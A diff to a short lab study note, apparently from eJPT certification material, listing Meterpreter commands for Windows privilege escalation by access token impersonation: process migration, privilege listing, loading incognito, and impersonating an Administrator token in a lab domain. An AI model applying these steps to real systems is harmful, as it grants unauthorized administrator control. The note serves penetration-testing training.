mehedibiswas/ejpt/Host-based-attacks/Windows/privilege-Escalation/Access-token-impersonation.markdown

 - migrate 3512 [ here 3512 is a process ID of explorer ]
 - getprivs [ this will list all the privileges of current user,here we find SeImpersonatePrivilege]
 - load incognito [ this will load the incognito module,this will fail bcz we migrate our session]
-- run [ this will again run the exploit for initial access ]
+- run [ this will again run the exploit again for initial access ]
 - laod incognito
 - list_tokens -u [ this will list all the user token ]
 - impersonate_token "ATTACKDEFENSE\Administrator" [ here ATTACKDEFENSE\Administrator found from the previous command ]